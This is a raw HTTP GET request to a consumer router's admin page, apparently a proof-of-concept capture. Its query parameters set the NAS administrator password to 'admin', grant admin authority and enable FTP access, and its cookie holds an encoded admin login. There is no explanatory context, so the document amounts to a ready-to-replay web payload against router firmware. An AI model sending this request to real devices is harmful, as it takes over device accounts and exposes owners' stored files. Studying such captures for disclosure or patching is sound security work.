GET /NGUCGXKAWNNZENRA/userRpm/NasUserAdvRpm.htm?nas_admin_pwd=admin&nas_admin_confirm_pwd=admin&nas_admin_authority=0&nas_admin_ftp=1&Save=Save&Modify=0 HTTP/1.1
Host: 192.168.0.254
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://192.168.0.254/NGUCGXKAWNNZENRA/userRpm/NasUserAdvRpm.htm?Modify=0
Cookie: Authorization=Basic%20YWRtaW46MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM%3D
Upgrade-Insecure-Requests: 1

